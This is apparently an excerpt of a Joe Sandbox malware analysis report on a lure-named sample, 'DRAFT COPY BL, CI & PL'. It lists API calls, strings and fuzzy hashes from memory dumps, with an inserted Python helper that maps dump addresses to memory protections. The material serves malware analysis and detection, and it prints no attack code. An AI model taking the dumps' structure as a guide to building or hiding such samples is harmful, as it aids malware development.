                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                • String ID: @$ThumbnailClass
                                                                • API String ID: 1788623398-1539354611
                                                                • Opcode ID: c9f8d038a865f7b55d7348b760cd8966ba0d4a780ba346655c90bc258b46b171
                                                                • Instruction ID: 1a6c693f6c1c5b835a068128f8efe23af05c4519afbd289ec630f736888738e4
                                                                • Opcode Fuzzy Hash: c9f8d038a865f7b55d7348b760cd8966ba0d4a780ba346655c90bc258b46b171
                                                                • Instruction Fuzzy Hash: 4081B1711083059FDB05EF10C895FAABBDCEF84354F08856AFD858A296DB34DD49CB61
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                • API String ID: 1038674560-1810252412
                                                                • Opcode ID: dd1d785c24eab19f229dca123bf9f80edaa4c02f0788ef5fc1bb438942ef9a57
                                                                • Instruction ID: 174492284c5d1123fe1ca886af6aeea3769d13968d16413f6256de53b9fb6861
                                                                • Opcode Fuzzy Hash: dd1d785c24eab19f229dca123bf9f80edaa4c02f0788ef5fc1bb438942ef9a57
                                                                • Instruction Fuzzy Hash: 6A31A271948209ABEA15FAA1DE03FAEF7B8AF90755F60042AF841711D1EF516F08CB53
                                                                APIs
                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 009A5013
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 009A501E
                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 009A5029
                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 009A5034
                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 009A503F
                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 009A504A
                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 009A5055
                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 009A5060
                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 009A506B
                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 009A5076
                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 009A5081
                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 009A508C
                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 009A5097
                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 009A50A2
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 009A50AD
                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 009A50B8
                                                                • GetCursorInfo.USER32(?), ref: 009A50C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Cursor$Load$Info
                                                                • String ID:
                                                                • API String ID: 2577412497-0
                                                                • Opcode ID: 5ffff57140a71f1cbaee396e1cf21cf23b9b2de00a2b32d5098bf0788eaf32ae
                                                                • Instruction ID: c18efbb7f0026f27c12bda82e5c65a639b987696d978dacd02fadc017ebd5a10
                                                                • Opcode Fuzzy Hash: 5ffff57140a71f1cbaee396e1cf21cf23b9b2de00a2b32d5098bf0788eaf32ae
                                                                • Instruction Fuzzy Hash: 3B31F2B1E483196ADF109FB68C8996EBFE8FF04750F50452AE50DE7280DA78A5008F91
                                                                APIs
                                                                • _memset.LIBCMT ref: 009BA259
                                                                • DestroyWindow.USER32(?,?), ref: 009BA2D3
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009BA34D
                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009BA36F
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009BA382
                                                                • DestroyWindow.USER32(00000000), ref: 009BA3A4
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00930000,00000000), ref: 009BA3DB
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009BA3F4
                                                                • GetDesktopWindow.USER32 ref: 009BA40D
                                                                • GetWindowRect.USER32(00000000), ref: 009BA414
                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009BA42C
                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009BA444
                                                                  • Part of subcall function 009325DB: GetWindowLongW.USER32(?,000000EB), ref: 009325EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                • String ID: 0$tooltips_class32
                                                                • API String ID: 1297703922-3619404913
                                                                • Opcode ID: fbb668a12a6c1095b14ad3c9437e45afb6d52d79d90e48e9511cdf505854b300
                                                                • Instruction ID: 20b4a8a9a9b0f12f6abd708fb1a568845b655e01935daee353c8253a1f89d362
                                                                • Opcode Fuzzy Hash: fbb668a12a6c1095b14ad3c9437e45afb6d52d79d90e48e9511cdf505854b300
                                                                • Instruction Fuzzy Hash: C871BC70154205AFD721CF28CD49FAA7BEAFB88324F04452DF985872B0DBB0E902DB52
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DragQueryPoint.SHELL32(?,?), ref: 009BC627
                                                                  • Part of subcall function 009BAB37: ClientToScreen.USER32(?,?), ref: 009BAB60
                                                                  • Part of subcall function 009BAB37: GetWindowRect.USER32(?,?), ref: 009BABD6
                                                                  • Part of subcall function 009BAB37: PtInRect.USER32(?,?,009BC014), ref: 009BABE6
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 009BC690
                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009BC69B
                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009BC6BE
                                                                • _wcscat.LIBCMT ref: 009BC6EE
                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 009BC705
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 009BC71E
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 009BC735
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 009BC757
                                                                • DragFinish.SHELL32(?), ref: 009BC75E
                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009BC851
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                • API String ID: 169749273-3440237614
                                                                • Opcode ID: 4d2af6e92df25b53b2b22177c5d0045c83a4eb588d80745ce85a32567aa3d652
                                                                • Instruction ID: 0d7e8117ddb21663e77052932719366f2162b90f9efb6f362f31eaa4697a0734
                                                                • Opcode Fuzzy Hash: 4d2af6e92df25b53b2b22177c5d0045c83a4eb588d80745ce85a32567aa3d652
                                                                • Instruction Fuzzy Hash: 20616C71108305AFC701EF64CD85EAFBBE9EFC9764F000A2EF595921A1DB70A949CB52
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 009B4424
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B446F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharMessageSendUpper
                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                • API String ID: 3974292440-4258414348
                                                                • Opcode ID: 7574da9851a52515112a1e29e9d75d7ce347b42447c7716c30e8f5546d086e37
                                                                • Instruction ID: 9f906da556133beaa73c44daf8f63f7f8746481de2562d0b8a043c4f83d41d69
                                                                • Opcode Fuzzy Hash: 7574da9851a52515112a1e29e9d75d7ce347b42447c7716c30e8f5546d086e37
                                                                • Instruction Fuzzy Hash: 0A9168742047019BCB14EF24C991BAEB7E1AFD5364F048868F8965B3A3CB75ED09DB81
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009BB8B4
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,009B6B11,?), ref: 009BB910
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009BB949
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009BB98C
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009BB9C3
                                                                • FreeLibrary.KERNEL32(?), ref: 009BB9CF
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009BB9DF
                                                                • DestroyIcon.USER32(?), ref: 009BB9EE
                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009BBA0B
                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009BBA17
                                                                  • Part of subcall function 00952EFD: __wcsicmp_l.LIBCMT ref: 00952F86
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                • String ID: .dll$.exe$.icl
                                                                • API String ID: 1212759294-1154884017
                                                                • Opcode ID: 99a7909576d91459823cb1ba475302d29957372f849d8c7bdcf5ac596774f156
                                                                • Instruction ID: b5908f760ed975b0709103a2963a527f18a328588a58fb80f69e24290564c6de
                                                                • Opcode Fuzzy Hash: 99a7909576d91459823cb1ba475302d29957372f849d8c7bdcf5ac596774f156
                                                                • Instruction Fuzzy Hash: 33610071900209BAEB14DF64CE85FFE7BACEB08725F104619FE15D61C0DBB49984DBA0
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?), ref: 0099DCDC
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0099DCEC
                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0099DCF8
                                                                • __wsplitpath.LIBCMT ref: 0099DD56
                                                                • _wcscat.LIBCMT ref: 0099DD6E
                                                                • _wcscat.LIBCMT ref: 0099DD80
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0099DD95
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DDA9
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DDDB
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DDFC
                                                                • _wcscpy.LIBCMT ref: 0099DE08
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0099DE47
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                • String ID: *.*
                                                                • API String ID: 3566783562-438819550
                                                                • Opcode ID: b45b0341efcb7016fd86fc6bea64ff946bf3709cf2d15dcb7e3a7f1143944d5b
                                                                • Instruction ID: 5f0229b094322767f49cf8532492e7b5a3e840b8138c3d94531b831d7d1fcea1
                                                                • Opcode Fuzzy Hash: b45b0341efcb7016fd86fc6bea64ff946bf3709cf2d15dcb7e3a7f1143944d5b
                                                                • Instruction Fuzzy Hash: 436159765042059FCB10EF64C884AAEB3E8FFC9314F04492EF99997251EB71EA45CF92
                                                                APIs
                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00999C7F
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00999CA0
                                                                • __swprintf.LIBCMT ref: 00999CF9
                                                                • __swprintf.LIBCMT ref: 00999D12
                                                                • _wprintf.LIBCMT ref: 00999DB9
                                                                • _wprintf.LIBCMT ref: 00999DD7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 311963372-3080491070
                                                                • Opcode ID: f9a71752771c81c273b77d6d0378f39d904d54d8bfa477ac2274d6be83edfe46
                                                                • Instruction ID: f617d264df5e9569fba4ed287b832241fa54d11321f225c0d666e075d3f3867e
                                                                • Opcode Fuzzy Hash: f9a71752771c81c273b77d6d0378f39d904d54d8bfa477ac2274d6be83edfe46
                                                                • Instruction Fuzzy Hash: 06519C72904509AACF15EBE4DD86FEEB778AF48300F500169F919721A2EB312F58DF61
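The Memory Dump Source lines name each dump with a dotted identifier, and the API lists give raw `ref:` addresses. The Python below is an added example, not part of the Joe Sandbox report or of the AutoIt runtime it analyses: it splits those identifiers, reads the fourth field as the mapping base and the fifth as a Windows page-protection value, and resolves a `ref:` address to the dump that contains it. That field interpretation is an assumption inferred from this report (0x20, 0x02 and 0x04 line up with the executable, read-only and writable mappings of a PE loaded at 0x930000), not a documented format; the protection constants themselves are the winnt.h values.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows page-protection constants from winnt.h (documented values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Eight dot-separated hex fields followed by ".sdmp".
DUMP_NAME_RE = re.compile(r"^([0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp$")


@dataclass(frozen=True)
class DumpMapping:
    name: str
    base: int       # field 4: assumed to be the mapping base address
    protect: int    # field 5: assumed to be the page protection at dump time

    @property
    def protect_name(self) -> str:
        # Mask off guard/no-cache modifier bits before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def executable(self) -> bool:
        return (self.protect & 0xF0) != 0


def parse_dump_name(name: str) -> DumpMapping:
    """Split a dump file name into base and protection.

    Field positions are an assumption inferred from the report, not a documented format.
    """
    m = DUMP_NAME_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a dump name: {name!r}")
    fields = m.group(1).split(".")
    return DumpMapping(name=name, base=int(fields[3], 16), protect=int(fields[4], 16))


def locate(addr: int, dumps: List[DumpMapping]) -> Optional[DumpMapping]:
    """Pick the dump whose base is the highest one not above addr.

    Sizes are not encoded in the names, so this assumes the mappings are
    contiguous and non-overlapping, which holds for the sections of one PE image.
    """
    below = [d for d in dumps if d.base <= addr]
    return max(below, key=lambda d: d.base) if below else None


def classify_refs(refs: List[int], dump_names: List[str]) -> dict:
    """Map each ref address to (base, protection name) of the dump holding it."""
    dumps = [parse_dump_name(n) for n in dump_names]
    out = {}
    for addr in refs:
        d = locate(addr, dumps)
        out[addr] = (d.base, d.protect_name) if d else None
    return out


# Dump names copied from the report's Memory Dump Source lists.
REPORT_DUMPS = [
    "00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    # 0x99A3CB is the CharLowerBuffW call site; 0x9F5890 is the HMENU global
    # passed to DeleteMenu/TrackPopupMenuEx further down in the report.
    for addr, where in classify_refs([0x99A3CB, 0x9F5890], REPORT_DUMPS).items():
        print(f"{addr:08X} -> {where}")
```

The useful check is that code references land in the executable mapping and data references such as the menu handle land in the writable one; a `ref:` that resolves to a read-write region is the kind of thing worth a second look in a sample flagged for thread injection.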
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • CharLowerBuffW.USER32(?,?), ref: 0099A3CB
                                                                • GetDriveTypeW.KERNEL32 ref: 0099A418
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0099A460
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0099A497
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0099A4C5
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                • API String ID: 2698844021-4113822522
                                                                • Opcode ID: edc7ec2ad0c15e372347da619ef49e11ef33a986848295e6ab75cf8055c926e3
                                                                • Instruction ID: 96a709bb3fcdbe2a824553305022c63fb13909e7fff3e544fc619644e75d7d5f
                                                                • Opcode Fuzzy Hash: edc7ec2ad0c15e372347da619ef49e11ef33a986848295e6ab75cf8055c926e3
                                                                • Instruction Fuzzy Hash: CD5169751083059FC710EF55C991A6AB7F8EFD8718F00886DF89A572A2DB71AD09CF82
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0096E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0098F8DF
                                                                • LoadStringW.USER32(00000000,?,0096E029,00000001), ref: 0098F8E8
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • GetModuleHandleW.KERNEL32(00000000,009F5310,?,00000FFF,?,?,0096E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0098F90A
                                                                • LoadStringW.USER32(00000000,?,0096E029,00000001), ref: 0098F90D
                                                                • __swprintf.LIBCMT ref: 0098F95D
                                                                • __swprintf.LIBCMT ref: 0098F96E
                                                                • _wprintf.LIBCMT ref: 0098FA17
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0098FA2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                • API String ID: 984253442-2268648507
                                                                • Opcode ID: 7e64cebd09b63d3d831789562af424bb7069fc1394e706ed6c811ca688d88a62
                                                                • Instruction ID: 136c861a9312ce184a1832a19a440ac8063e408e463e55301f4066e2de12646c
                                                                • Opcode Fuzzy Hash: 7e64cebd09b63d3d831789562af424bb7069fc1394e706ed6c811ca688d88a62
                                                                • Instruction Fuzzy Hash: 20412CB2904209AACF15FBE0DD96FEEB778AF98310F500065F505B6192EA356F09CF61
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                • String ID:
                                                                • API String ID: 884005220-0
                                                                • Opcode ID: ab61fedceb04bf8f0776aea64db6f09b6c5d01207f158b9a33d6bebce8e63e40
                                                                • Instruction ID: 781da285a19a80ce2abfc04f5735d80bc95f0a9fe899fc10497428a004b8bfa0
                                                                • Opcode Fuzzy Hash: ab61fedceb04bf8f0776aea64db6f09b6c5d01207f158b9a33d6bebce8e63e40
                                                                • Instruction Fuzzy Hash: F861F572A08212AFEB109F65DD0277A77A9EF41361F21411AE801B71D1EB78DD45CFA2
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 009BBA56
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 009BBA6D
                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 009BBA78
                                                                • CloseHandle.KERNEL32(00000000), ref: 009BBA85
                                                                • GlobalLock.KERNEL32(00000000), ref: 009BBA8E
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009BBA9D
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 009BBAA6
                                                                • CloseHandle.KERNEL32(00000000), ref: 009BBAAD
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009BBABE
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,009C2CAC,?), ref: 009BBAD7
                                                                • GlobalFree.KERNEL32(00000000), ref: 009BBAE7
                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 009BBB0B
                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 009BBB36
                                                                • DeleteObject.GDI32(00000000), ref: 009BBB5E
